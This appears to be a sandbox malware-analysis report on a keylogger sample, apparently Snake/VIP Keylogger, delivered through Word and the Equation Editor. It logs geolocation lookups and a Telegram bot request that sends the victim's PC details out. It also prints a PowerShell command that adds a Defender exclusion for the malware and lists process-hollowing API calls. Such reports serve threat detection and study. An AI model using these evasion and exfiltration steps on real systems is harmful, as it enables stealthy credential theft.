                                                                                                                                  2024-11-19 17:08:18 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  5 | 192.168.2.22 | 49172 | 188.114.96.3 | 443 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  2024-11-19 17:08:19 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:20 UTC | 848 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:20 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 9
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mp1oMJ3mgnaUQFY4JCCfVVXBHeo6rb82kzRuDDnnJ8Dvb6LJwHHrkye9YQl%2B2xmDEvZyzjQcuWTanBW8gxgyog9j10%2FSbykQu28qL7Gn8T%2FWy%2F8dJwxNQBfmHynVcn4IrQ0Ygeac"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd395abf8cb1-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1875&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1582655&cwnd=185&unsent_bytes=0&cid=b9939bbb12f1a74d&ts=149&x=0"
                                                                                                                                  2024-11-19 17:08:20 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  6 | 192.168.2.22 | 49174 | 188.114.96.3 | 443 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  2024-11-19 17:08:21 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
2024-11-19 17:08:21 UTC | 849 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:21 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 10
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KbGdG7LJv9TvksPuzL%2BH8qTZttOiI7x8oxYYA%2BiuM0cSKE5d0HyPMHd0fsPeMcHW77O4lRO6y0uyUA8MsTio%2BejJtQ0CcZwGKSrmsS9BGFHvgau6MRG%2F1iuEpyHJcQfZqUiCAA1L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd409a020fa7-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1654&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1688837&cwnd=238&unsent_bytes=0&cid=f1ac1f60ef3d2114&ts=165&x=0"
2024-11-19 17:08:21 UTC | 361 | IN
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.22 | 49176 | 188.114.96.3 | 443 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:08:22 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
2024-11-19 17:08:22 UTC | 845 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:22 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 11
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62zh%2FsG%2B6itwvatrOGA4RPMgbjpduXZofK0csM2dehJ41mDfRh3lQyLLMAPjUjHNKu0cbzgW1qZpgoi8gQwS9Hdst69YsXt6Dq4WiepTA56BOSflOZWWSpeFIh9zbmLEuKntTESJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd47ec51184d-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2085&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1343146&cwnd=236&unsent_bytes=0&cid=6e558a732ba4a4c2&ts=177&x=0"
2024-11-19 17:08:22 UTC | 361 | IN
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.22 | 49178 | 188.114.96.3 | 443 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:08:23 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
2024-11-19 17:08:23 UTC | 847 | IN | HTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:23 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 12
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qg9yDY54aoisIDPpmhz14I07E1cUCl5yNbeTEoF%2BkHNAMpm1I71frnvTy5SvXwcyfygCtnrTjYQTa4fEOpFedu2Wf%2Bjdh8KshI2Bdssmw17FhgrL508%2FkGdwjarmfiCqcQ7KpkUD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd4f5ed11869-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1519&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1853968&cwnd=250&unsent_bytes=0&cid=e4a537398e5e67e8&ts=181&x=0"
2024-11-19 17:08:23 UTC | 361 | IN
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.22 | 49179 | 149.154.167.220 | 443 | 3860 | C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:08:24 UTC | 353 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2011/20/2024%20/%201:09:14%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Connection: Keep-Alive
2024-11-19 17:08:24 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:24 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 55
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-19 17:08:24 UTC | 55 | IN
                                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



                                                                                                                                  Target ID:0
                                                                                                                                  Start time:12:07:59
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                  Imagebase:0x13fb50000
                                                                                                                                  File size:1'423'704 bytes
                                                                                                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:12:08:00
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:543'304 bytes
                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:12:08:04
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                                                                                                                                  Imagebase:0xf10000
                                                                                                                                  File size:837'120 bytes
                                                                                                                                  MD5 hash:9D980CAD65D26D5E36BD306044B26AC9
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 32%, ReversingLabs
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:12:08:08
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                                                                                                                                  Imagebase:0x1390000
                                                                                                                                  File size:427'008 bytes
                                                                                                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:12:08:08
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                                                                                                                                  Imagebase:0xf10000
                                                                                                                                  File size:837'120 bytes
                                                                                                                                  MD5 hash:9D980CAD65D26D5E36BD306044B26AC9
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:12:08:23
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:543'304 bytes
                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false


                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:14.8%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:126
                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                    execution_graph 10267 96019a 10268 960260 10267->10268 10269 9601a4 10267->10269 10272 960fb8 10269->10272 10289 960fa8 10269->10289 10273 960fd2 10272->10273 10306 961534 10273->10306 10311 961680 10273->10311 10315 961562 10273->10315 10320 9613c7 10273->10320 10325 961866 10273->10325 10331 961bb8 10273->10331 10337 961818 10273->10337 10344 96175a 10273->10344 10349 9616fa 10273->10349 10354 961c5c 10273->10354 10358 96163c 10273->10358 10364 9614b1 10273->10364 10369 9617b2 10273->10369 10373 9615f5 10273->10373 10274 960ff6 10274->10268 10290 960fb8 10289->10290 10292 961534 2 API calls 10290->10292 10293 9615f5 2 API calls 10290->10293 10294 9617b2 2 API calls 10290->10294 10295 9614b1 2 API calls 10290->10295 10296 96163c 2 API calls 10290->10296 10297 961c5c 2 API calls 10290->10297 10298 9616fa 2 API calls 10290->10298 10299 96175a 2 API calls 10290->10299 10300 961818 2 API calls 10290->10300 10301 961bb8 2 API calls 10290->10301 10302 961866 2 API calls 10290->10302 10303 9613c7 2 API calls 10290->10303 10304 961562 2 API calls 10290->10304 10305 961680 2 API calls 10290->10305 10291 960ff6 10291->10268 10292->10291 10293->10291 10294->10291 10295->10291 10296->10291 10297->10291 10298->10291 10299->10291 10300->10291 10301->10291 10302->10291 10303->10291 10304->10291 10305->10291 10307 961558 10306->10307 10378 48f6a8 10307->10378 10382 48f6b0 10307->10382 10308 9619e8 10386 48f588 10311->10386 10390 48f580 10311->10390 10312 96164f 10312->10311 10316 961b10 10315->10316 10318 48f6a8 WriteProcessMemory 10316->10318 10319 48f6b0 WriteProcessMemory 10316->10319 10317 9613bb 10317->10274 10318->10317 10319->10317 10321 9613ec 10320->10321 10394 48fa48 10321->10394 10398 48fa3c 10321->10398 10326 961774 10325->10326 10328 9613bb 10326->10328 10402 48f368 10326->10402 10406 48f364 10326->10406 10327 961789 10327->10274 
10328->10274 10332 961bc5 10331->10332 10333 9616fa 10331->10333 10335 48f368 ResumeThread 10333->10335 10336 48f364 ResumeThread 10333->10336 10334 961789 10334->10274 10335->10334 10336->10334 10338 961774 10337->10338 10341 9613bb 10337->10341 10339 96195a 10338->10339 10342 48f368 ResumeThread 10338->10342 10343 48f364 ResumeThread 10338->10343 10340 961789 10340->10274 10341->10274 10342->10340 10343->10340 10345 961763 10344->10345 10347 48f368 ResumeThread 10345->10347 10348 48f364 ResumeThread 10345->10348 10346 961789 10346->10274 10347->10346 10348->10346 10350 961700 10349->10350 10352 48f368 ResumeThread 10350->10352 10353 48f364 ResumeThread 10350->10353 10351 961789 10351->10274 10352->10351 10353->10351 10410 9621f8 10354->10410 10415 962208 10354->10415 10355 961c74 10359 96156a 10358->10359 10360 961e33 10359->10360 10362 48f6a8 WriteProcessMemory 10359->10362 10363 48f6b0 WriteProcessMemory 10359->10363 10361 9613bb 10361->10274 10362->10361 10363->10361 10365 9613e2 10364->10365 10367 48fa48 CreateProcessA 10365->10367 10368 48fa3c CreateProcessA 10365->10368 10366 9614fd 10367->10366 10368->10366 10428 48f808 10369->10428 10432 48f810 10369->10432 10370 9617d7 10374 961618 10373->10374 10376 48f6a8 WriteProcessMemory 10374->10376 10377 48f6b0 WriteProcessMemory 10374->10377 10375 961a36 10376->10375 10377->10375 10379 48f6b0 WriteProcessMemory 10378->10379 10381 48f79b 10379->10381 10381->10308 10383 48f6fc WriteProcessMemory 10382->10383 10385 48f79b 10383->10385 10385->10308 10387 48f5cc VirtualAllocEx 10386->10387 10389 48f64a 10387->10389 10389->10312 10391 48f588 VirtualAllocEx 10390->10391 10393 48f64a 10391->10393 10393->10312 10395 48facf CreateProcessA 10394->10395 10397 48fd2d 10395->10397 10397->10397 10399 48facf CreateProcessA 10398->10399 10401 48fd2d 10399->10401 10403 48f3ac ResumeThread 10402->10403 10405 48f3fe 10403->10405 10405->10327 10407 48f3ac ResumeThread 10406->10407 10409 48f3fe 10407->10409 10409->10327 10411 96221d 
10410->10411 10420 48f458 10411->10420 10424 48f453 10411->10424 10412 962233 10412->10355 10416 96221d 10415->10416 10418 48f458 Wow64SetThreadContext 10416->10418 10419 48f453 Wow64SetThreadContext 10416->10419 10417 962233 10417->10355 10418->10417 10419->10417 10421 48f4a1 Wow64SetThreadContext 10420->10421 10423 48f51f 10421->10423 10423->10412 10425 48f4a1 Wow64SetThreadContext 10424->10425 10427 48f51f 10425->10427 10427->10412 10429 48f810 ReadProcessMemory 10428->10429 10431 48f8da 10429->10431 10431->10370 10433 48f85c ReadProcessMemory 10432->10433 10435 48f8da 10433->10435 10435->10370

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'p$:$pp$~
                                                                                                                                    • API String ID: 0-1820105848
                                                                                                                                    • Opcode ID: d476d690ab3d1391c8151ea91593f1c1a704b6d9da540f6eaa58791f9b340015
                                                                                                                                    • Instruction ID: 445f9a304db0fa832f885df92041833dceb6ca2693e88c7d81070702411a5ffc
                                                                                                                                    • Opcode Fuzzy Hash: d476d690ab3d1391c8151ea91593f1c1a704b6d9da540f6eaa58791f9b340015
                                                                                                                                    • Instruction Fuzzy Hash: 0E42F375A00218DFDB15DFA9C980B9DBBB2FF88304F1584EAE509AB261D7319E91DF10

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $p$}/
                                                                                                                                    • API String ID: 0-2871476230
                                                                                                                                    • Opcode ID: dd4737be5b3b5c5e07935df0b0b63140499f6b12b0d2756ec3f9d242abb70156
                                                                                                                                    • Instruction ID: 09226d4e5227feedefe58231eee4d4fe808e4b7e7d8e92d4d26809decb64d76c
                                                                                                                                    • Opcode Fuzzy Hash: dd4737be5b3b5c5e07935df0b0b63140499f6b12b0d2756ec3f9d242abb70156
                                                                                                                                    • Instruction Fuzzy Hash: 9903E534A103198FDB25EF64C894A9DB7B5FF89300F5186EAE4096B361DB34AE85CF44

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $p$}/
                                                                                                                                    • API String ID: 0-2871476230
                                                                                                                                    • Opcode ID: 078e2b2e2578adc3272232774f4dd31a2ceaecb5e0382a614f13a6bb4e2d253e
                                                                                                                                    • Instruction ID: d82a78cc7e99e00547b11348d3d8c62db07af3ea7862239a091e890ca49c8d96
                                                                                                                                    • Opcode Fuzzy Hash: 078e2b2e2578adc3272232774f4dd31a2ceaecb5e0382a614f13a6bb4e2d253e
                                                                                                                                    • Instruction Fuzzy Hash: 6CF2E634A10319CFDB25EF64C894A99B7B5FF89300F5186EAE4096B361DB30AE85CF44

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0048FD0F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: 020aa0f1f5a604640a8a63405003d64e3b2c6cd461e0446640c9b7acb455f088
                                                                                                                                    • Instruction ID: 74d93d1c69fc51f0b14fd914b448bb91b9e1c84d30876b4c7b7a621f1e1b5a56
                                                                                                                                    • Opcode Fuzzy Hash: 020aa0f1f5a604640a8a63405003d64e3b2c6cd461e0446640c9b7acb455f088
                                                                                                                                    • Instruction Fuzzy Hash: 55C11571D002198FDF24DFA8C851BEEBBB1BB09300F1095AAD859B7250DB749A89CF94

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0048FD0F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: 45eb9e7c98dd68b26f7fc67883f20295db49f3026c30e6ca47fda0f2aaec8fca
                                                                                                                                    • Instruction ID: 12146aefba95ebc64206a28d2ce44e20ade30d4b4ed4723b7e5c0d76db091eba
                                                                                                                                    • Opcode Fuzzy Hash: 45eb9e7c98dd68b26f7fc67883f20295db49f3026c30e6ca47fda0f2aaec8fca
                                                                                                                                    • Instruction Fuzzy Hash: C6C11571D0021D8FDF24DFA8C851BEEBBB1BB09300F1095AAD919B7250DB749A89CF94

                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0048F783
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: 00166ee63447c70219e8a6d954160aed6fcc792deebe8fa08b70e623dfa8225b
                                                                                                                                    • Instruction ID: 480b9798fec971056851925896c9e8c2244e60495872a189bb49edb5bdfce23f
                                                                                                                                    • Opcode Fuzzy Hash: 00166ee63447c70219e8a6d954160aed6fcc792deebe8fa08b70e623dfa8225b
                                                                                                                                    • Instruction Fuzzy Hash: 4B41BDB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D338AA45CF64

                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0048F783
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: 88e57672f3e421bd802041add8aa89fe30b922e2b06d60e657d706b8b044d02a
                                                                                                                                    • Instruction ID: c2f1d85ab79ad48c00d75c70468a7848cb9b80fa746da688cbde8d4c509fef2f
                                                                                                                                    • Opcode Fuzzy Hash: 88e57672f3e421bd802041add8aa89fe30b922e2b06d60e657d706b8b044d02a
                                                                                                                                    • Instruction Fuzzy Hash: 36419EB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D734AA45CF64

                                                                                                                                    APIs
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0048F8C2
                                                                                                                                    Memory Dump Source
